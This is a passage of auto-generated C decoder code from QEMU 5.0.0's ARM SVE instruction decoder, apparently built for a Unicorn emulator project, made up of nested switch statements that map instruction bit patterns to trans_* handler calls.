........ */ disas_sve_extract_rdn_pg4(ctx, &u.f_rpri_esz, insn); switch ((insn >> 14) & 0x3) { case 0x0: /* 00000101 ..01.... 00...... ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:474 */ u.f_rpri_esz.imm = expand_imm_sh8s(ctx, extract32(insn, 5, 9)); if (trans_CPY_z_i(ctx, &u.f_rpri_esz)) return true; return false; case 0x1: /* 00000101 ..01.... 01...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:473 */ u.f_rpri_esz.imm = expand_imm_sh8s(ctx, extract32(insn, 5, 9)); if (trans_CPY_m_i(ctx, &u.f_rpri_esz)) return true; return false; case 0x3: /* 00000101 ..01.... 11...... ........ */ switch ((insn >> 13) & 0x1) { case 0x0: /* 00000101 ..01.... 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:470 */ u.f_rpri_esz.imm = extract32(insn, 5, 8); if (trans_FCPY(ctx, &u.f_rpri_esz)) return true; return false; } return false; } return false; } return false; case 0x01200000: /* 00000101 ..1..... ........ ........ */ switch ((insn >> 14) & 0x3) { case 0x0: /* 00000101 ..1..... 00...... ........ */ switch ((insn >> 13) & 0x1) { case 0x0: /* 00000101 ..1..... 000..... ........ */ disas_sve_extract_disas_sve_Fmt_61(ctx, &u.f_rrri, insn); switch ((insn >> 22) & 0x3) { case 0x0: /* 00000101 001..... 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:479 */ if (trans_EXT(ctx, &u.f_rrri)) return true; return false; } return false; case 0x1: /* 00000101 ..1..... 001..... ........ */ switch ((insn >> 10) & 0x7) { case 0x0: /* 00000101 ..1..... 001000.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:488 */ disas_sve_extract_disas_sve_Fmt_62(ctx, &u.f_rri, insn); if (trans_DUP_x(ctx, &u.f_rri)) return true; return false; case 0x4: /* 00000101 ..1..... 001100.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:501 */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); if (trans_TBL(ctx, &u.f_rrr_esz)) return true; return false; case 0x6: /* 00000101 ..1..... 001110.. ........ */ switch ((insn >> 18) & 0x7) { case 0x0: /* 00000101 ..1000.. 001110.. ........ */ disas_sve_extract_rd_rn(ctx, &u.f_rr_esz, insn); switch ((insn >> 16) & 0x3) { case 0x0: /* 00000101 ..100000 001110.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:485 */ if (trans_DUP_s(ctx, &u.f_rr_esz)) return true; return false; } return false; case 0x1: /* 00000101 ..1001.. 001110.. ........ */ disas_sve_extract_rdn_rm(ctx, &u.f_rrr_esz, insn); switch ((insn >> 16) & 0x3) { case 0x0: /* 00000101 ..100100 001110.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:495 */ if (trans_INSR_r(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x4: /* 00000101 ..1100.. 001110.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:504 */ disas_sve_extract_disas_sve_Fmt_63(ctx, &u.f_disas_sve30, insn); if (trans_UNPK(ctx, &u.f_disas_sve30)) return true; return false; case 0x5: /* 00000101 ..1101.. 001110.. ........ */ disas_sve_extract_rdn_rm(ctx, &u.f_rrr_esz, insn); switch ((insn >> 16) & 0x3) { case 0x0: /* 00000101 ..110100 001110.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:492 */ if (trans_INSR_f(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x6: /* 00000101 ..1110.. 001110.. ........ 
*/ disas_sve_extract_rd_rn(ctx, &u.f_rr_esz, insn); switch ((insn >> 16) & 0x3) { case 0x0: /* 00000101 ..111000 001110.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:498 */ if (trans_REV_v(ctx, &u.f_rr_esz)) return true; return false; } return false; } return false; } return false; } return false; case 0x1: /* 00000101 ..1..... 01...... ........ */ switch ((insn >> 10) & 0xf) { case 0x0: /* 00000101 ..1..... 010000.. ........ */ switch (insn & 0x00100210) { case 0x00000000: /* 00000101 ..10.... 0100000. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:509 */ disas_sve_extract_pd_pn_pm(ctx, &u.f_rrr_esz, insn); if (trans_ZIP1_p(ctx, &u.f_rrr_esz)) return true; return false; case 0x00100000: /* 00000101 ..11.... 0100000. ...0.... */ switch ((insn >> 16) & 0xf) { case 0x0: /* 00000101 ..110000 0100000. ...0.... */ disas_sve_extract_pd_pn_e0(ctx, &u.f_rr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x0: /* 00000101 00110000 0100000. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:520 */ if (trans_PUNPKLO(ctx, &u.f_rr_esz)) return true; return false; } return false; case 0x1: /* 00000101 ..110001 0100000. ...0.... */ disas_sve_extract_pd_pn_e0(ctx, &u.f_rr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x0: /* 00000101 00110001 0100000. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:521 */ if (trans_PUNPKHI(ctx, &u.f_rr_esz)) return true; return false; } return false; case 0x4: /* 00000101 ..110100 0100000. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:517 */ disas_sve_extract_pd_pn(ctx, &u.f_rr_esz, insn); if (trans_REV_p(ctx, &u.f_rr_esz)) return true; return false; } return false; } return false; case 0x1: /* 00000101 ..1..... 010001.. ........ */ disas_sve_extract_pd_pn_pm(ctx, &u.f_rrr_esz, insn); switch (insn & 0x00100210) { case 0x00000000: /* 00000101 ..10.... 0100010. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:510 */ if (trans_ZIP2_p(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x2: /* 00000101 ..1..... 010010.. ........ */ disas_sve_extract_pd_pn_pm(ctx, &u.f_rrr_esz, insn); switch (insn & 0x00100210) { case 0x00000000: /* 00000101 ..10.... 0100100. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:511 */ if (trans_UZP1_p(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x3: /* 00000101 ..1..... 010011.. ........ */ disas_sve_extract_pd_pn_pm(ctx, &u.f_rrr_esz, insn); switch (insn & 0x00100210) { case 0x00000000: /* 00000101 ..10.... 0100110. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:512 */ if (trans_UZP2_p(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x4: /* 00000101 ..1..... 010100.. ........ */ disas_sve_extract_pd_pn_pm(ctx, &u.f_rrr_esz, insn); switch (insn & 0x00100210) { case 0x00000000: /* 00000101 ..10.... 0101000. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:513 */ if (trans_TRN1_p(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x5: /* 00000101 ..1..... 010101.. ........ */ disas_sve_extract_pd_pn_pm(ctx, &u.f_rrr_esz, insn); switch (insn & 0x00100210) { case 0x00000000: /* 00000101 ..10.... 0101010. ...0.... 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:514 */ if (trans_TRN2_p(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x8: /* 00000101 ..1..... 011000.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:526 */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); if (trans_ZIP1_z(ctx, &u.f_rrr_esz)) return true; return false; case 0x9: /* 00000101 ..1..... 011001.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:527 */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); if (trans_ZIP2_z(ctx, &u.f_rrr_esz)) return true; return false; case 0xa: /* 00000101 ..1..... 011010.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:528 */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); if (trans_UZP1_z(ctx, &u.f_rrr_esz)) return true; return false; case 0xb: /* 00000101 ..1..... 011011.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:529 */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); if (trans_UZP2_z(ctx, &u.f_rrr_esz)) return true; return false; case 0xc: /* 00000101 ..1..... 011100.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:530 */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); if (trans_TRN1_z(ctx, &u.f_rrr_esz)) return true; return false; case 0xd: /* 00000101 ..1..... 011101.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:531 */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); if (trans_TRN2_z(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x2: /* 00000101 ..1..... 10...... ........ */ switch (insn & 0x001f2000) { case 0x00000000: /* 00000101 ..100000 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:560 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_CPY_m_v(ctx, &u.f_rpr_esz)) return true; return false; case 0x00002000: /* 00000101 ..100000 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:556 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_LASTA_r(ctx, &u.f_rpr_esz)) return true; return false; case 0x00010000: /* 00000101 ..100001 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:537 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_COMPACT(ctx, &u.f_rpr_esz)) return true; return false; case 0x00012000: /* 00000101 ..100001 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:557 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_LASTB_r(ctx, &u.f_rpr_esz)) return true; return false; case 0x00020000: /* 00000101 ..100010 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:552 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_LASTA_v(ctx, &u.f_rpr_esz)) return true; return false; case 0x00030000: /* 00000101 ..100011 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:553 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_LASTB_v(ctx, &u.f_rpr_esz)) return true; return false; case 0x00040000: /* 00000101 ..100100 100..... ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:567 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_REVB(ctx, &u.f_rpr_esz)) return true; return false; case 0x00050000: /* 00000101 ..100101 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:568 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_REVH(ctx, &u.f_rpr_esz)) return true; return false; case 0x00060000: /* 00000101 ..100110 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:569 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_REVW(ctx, &u.f_rpr_esz)) return true; return false; case 0x00070000: /* 00000101 ..100111 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:570 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_RBIT(ctx, &u.f_rpr_esz)) return true; return false; case 0x00080000: /* 00000101 ..101000 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:540 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_CLASTA_z(ctx, &u.f_rprr_esz)) return true; return false; case 0x00082000: /* 00000101 ..101000 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:563 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_CPY_m_r(ctx, &u.f_rpr_esz)) return true; return false; case 0x00090000: /* 00000101 ..101001 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:541 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_CLASTB_z(ctx, &u.f_rprr_esz)) return true; return false; case 0x000a0000: /* 00000101 ..101010 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:544 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_CLASTA_v(ctx, &u.f_rpr_esz)) return true; return false; case 0x000b0000: /* 00000101 ..101011 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:545 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_CLASTB_v(ctx, &u.f_rpr_esz)) return true; return false; case 0x000c0000: /* 00000101 ..101100 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:573 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_SPLICE(ctx, &u.f_rprr_esz)) return true; return false; case 0x00102000: /* 00000101 ..110000 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:548 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_CLASTA_r(ctx, &u.f_rpr_esz)) return true; return false; case 0x00112000: /* 00000101 ..110001 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:549 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_CLASTB_r(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x3: /* 00000101 ..1..... 11...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:578 */ disas_sve_extract_rd_pg4_rn_rm(ctx, &u.f_rprr_esz, insn); if (trans_SEL_zpzz(ctx, &u.f_rprr_esz)) return true; return false; } return false; } return false; case 0x12: /* 0010010. 
........ ........ ........ */ switch (insn & 0x01200000) { case 0x00000000: /* 00100100 ..0..... ........ ........ */ disas_sve_extract_pd_pg_rn_rm(ctx, &u.f_rprr_esz, insn); switch (insn & 0x0000e010) { case 0x00000000: /* 00100100 ..0..... 000..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:583 */ if (trans_CMPHS_ppzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x00000010: /* 00100100 ..0..... 000..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:584 */ if (trans_CMPHI_ppzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x00002000: /* 00100100 ..0..... 001..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:592 */ if (trans_CMPEQ_ppzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x00002010: /* 00100100 ..0..... 001..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:593 */ if (trans_CMPNE_ppzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x00004000: /* 00100100 ..0..... 010..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:594 */ if (trans_CMPGE_ppzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x00004010: /* 00100100 ..0..... 010..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:595 */ if (trans_CMPGT_ppzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x00006000: /* 00100100 ..0..... 011..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:596 */ if (trans_CMPLT_ppzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x00006010: /* 00100100 ..0..... 011..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:597 */ if (trans_CMPLE_ppzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x00008000: /* 00100100 ..0..... 100..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:585 */ if (trans_CMPGE_ppzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x00008010: /* 00100100 ..0..... 100..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:586 */ if (trans_CMPGT_ppzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x0000a000: /* 00100100 ..0..... 101..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:587 */ if (trans_CMPEQ_ppzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x0000a010: /* 00100100 ..0..... 101..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:588 */ if (trans_CMPNE_ppzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x0000c000: /* 00100100 ..0..... 110..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:598 */ if (trans_CMPHS_ppzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x0000c010: /* 00100100 ..0..... 110..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:599 */ if (trans_CMPHI_ppzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x0000e000: /* 00100100 ..0..... 111..... ...0.... 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:600 */ if (trans_CMPLO_ppzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x0000e010: /* 00100100 ..0..... 111..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:601 */ if (trans_CMPLS_ppzw(ctx, &u.f_rprr_esz)) return true; return false; } return false; case 0x00200000: /* 00100100 ..1..... ........ ........ */ disas_sve_extract_pd_pg_rn_i7(ctx, &u.f_rpri_esz, insn); switch (insn & 0x00002010) { case 0x00000000: /* 00100100 ..1..... ..0..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:606 */ if (trans_CMPHS_ppzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x00000010: /* 00100100 ..1..... ..0..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:607 */ if (trans_CMPHI_ppzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x00002000: /* 00100100 ..1..... ..1..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:608 */ if (trans_CMPLO_ppzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x00002010: /* 00100100 ..1..... ..1..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:609 */ if (trans_CMPLS_ppzi(ctx, &u.f_rpri_esz)) return true; return false; } return false; case 0x01000000: /* 00100101 ..0..... ........ ........ */ switch (insn & 0x0000c010) { case 0x00000000: /* 00100101 ..0..... 00...... ...0.... */ disas_sve_extract_pd_pg_rn_i5(ctx, &u.f_rpri_esz, insn); switch ((insn >> 13) & 0x1) { case 0x0: /* 00100101 ..0..... 000..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:614 */ if (trans_CMPGE_ppzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x1: /* 00100101 ..0..... 001..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:616 */ if (trans_CMPLT_ppzi(ctx, &u.f_rpri_esz)) return true; return false; } return false; case 0x00000010: /* 00100101 ..0..... 00...... ...1.... */ disas_sve_extract_pd_pg_rn_i5(ctx, &u.f_rpri_esz, insn); switch ((insn >> 13) & 0x1) { case 0x0: /* 00100101 ..0..... 000..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:615 */ if (trans_CMPGT_ppzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x1: /* 00100101 ..0..... 001..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:617 */ if (trans_CMPLE_ppzi(ctx, &u.f_rpri_esz)) return true; return false; } return false; case 0x00004000: /* 00100101 ..0..... 01...... ...0.... */ switch (insn & 0x00900200) { case 0x00000000: /* 00100101 0.00.... 01....0. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:624 */ disas_sve_extract_pd_pg_pn_pm_s(ctx, &u.f_rprr_s, insn); if (trans_AND_pppp(ctx, &u.f_rprr_s)) return true; return false; case 0x00000200: /* 00100101 0.00.... 01....1. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:626 */ disas_sve_extract_pd_pg_pn_pm_s(ctx, &u.f_rprr_s, insn); if (trans_EOR_pppp(ctx, &u.f_rprr_s)) return true; return false; case 0x00100000: /* 00100101 0.01.... 01....0. ...0.... 
*/ disas_sve_extract_pd_pg_pn_s(ctx, &u.f_rpr_s, insn); switch ((insn >> 16) & 0xf) { case 0x0: /* 00100101 0.010000 01....0. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:669 */ if (trans_BRKA_z(ctx, &u.f_rpr_s)) return true; return false; case 0x8: /* 00100101 0.011000 01....0. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:675 */ if (trans_BRKN(ctx, &u.f_rpr_s)) return true; return false; } return false; case 0x00800000: /* 00100101 1.00.... 01....0. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:628 */ disas_sve_extract_pd_pg_pn_pm_s(ctx, &u.f_rprr_s, insn); if (trans_ORR_pppp(ctx, &u.f_rprr_s)) return true; return false; case 0x00800200: /* 00100101 1.00.... 01....1. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:630 */ disas_sve_extract_pd_pg_pn_pm_s(ctx, &u.f_rprr_s, insn); if (trans_NOR_pppp(ctx, &u.f_rprr_s)) return true; return false; case 0x00900000: /* 00100101 1.01.... 01....0. ...0.... */ disas_sve_extract_pd_pg_pn_s(ctx, &u.f_rpr_s, insn); switch ((insn >> 16) & 0xf) { case 0x0: /* 00100101 1.010000 01....0. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:670 */ if (trans_BRKB_z(ctx, &u.f_rpr_s)) return true; return false; } return false; } return false; case 0x00004010: /* 00100101 ..0..... 01...... ...1.... */ switch (insn & 0x00900200) { case 0x00000000: /* 00100101 0.00.... 01....0. ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:625 */ disas_sve_extract_pd_pg_pn_pm_s(ctx, &u.f_rprr_s, insn); if (trans_BIC_pppp(ctx, &u.f_rprr_s)) return true; return false; case 0x00000200: /* 00100101 0.00.... 01....1. ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:627 */ disas_sve_extract_pd_pg_pn_pm_s(ctx, &u.f_rprr_s, insn); if (trans_SEL_pppp(ctx, &u.f_rprr_s)) return true; return false; case 0x00100000: /* 00100101 0.01.... 01....0. ...1.... */ disas_sve_extract_pd_pg_pn_s0(ctx, &u.f_rpr_s, insn); switch (insn & 0x004f0000) { case 0x00000000: /* 00100101 00010000 01....0. ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:671 */ if (trans_BRKA_m(ctx, &u.f_rpr_s)) return true; return false; } return false; case 0x00800000: /* 00100101 1.00.... 01....0. ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:629 */ disas_sve_extract_pd_pg_pn_pm_s(ctx, &u.f_rprr_s, insn); if (trans_ORN_pppp(ctx, &u.f_rprr_s)) return true; return false; case 0x00800200: /* 00100101 1.00.... 01....1. ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:631 */ disas_sve_extract_pd_pg_pn_pm_s(ctx, &u.f_rprr_s, insn); if (trans_NAND_pppp(ctx, &u.f_rprr_s)) return true; return false; case 0x00900000: /* 00100101 1.01.... 01....0. ...1.... */ disas_sve_extract_pd_pg_pn_s0(ctx, &u.f_rpr_s, insn); switch (insn & 0x004f0000) { case 0x00000000: /* 00100101 10010000 01....0. ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:672 */ if (trans_BRKB_m(ctx, &u.f_rpr_s)) return true; return false; } return false; } return false; case 0x00008000: /* 00100101 ..0..... 10...... ...0.... 
*/ disas_sve_extract_pd_pg_rn_i5(ctx, &u.f_rpri_esz, insn); switch ((insn >> 13) & 0x1) { case 0x0: /* 00100101 ..0..... 100..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:618 */ if (trans_CMPEQ_ppzi(ctx, &u.f_rpri_esz)) return true; return false; } return false; case 0x00008010: /* 00100101 ..0..... 10...... ...1.... */ disas_sve_extract_pd_pg_rn_i5(ctx, &u.f_rpri_esz, insn); switch ((insn >> 13) & 0x1) { case 0x0: /* 00100101 ..0..... 100..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:619 */ if (trans_CMPNE_ppzi(ctx, &u.f_rpri_esz)) return true; return false; } return false; case 0x0000c000: /* 00100101 ..0..... 11...... ...0.... */ switch ((insn >> 20) & 0x1) { case 0x0: /* 00100101 ..00.... 11...... ...0.... */ disas_sve_extract_pd_pg_pn_pm_s(ctx, &u.f_rprr_s, insn); switch (insn & 0x00800200) { case 0x00000000: /* 00100101 0.00.... 11....0. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:665 */ if (trans_BRKPA(ctx, &u.f_rprr_s)) return true; return false; } return false; case 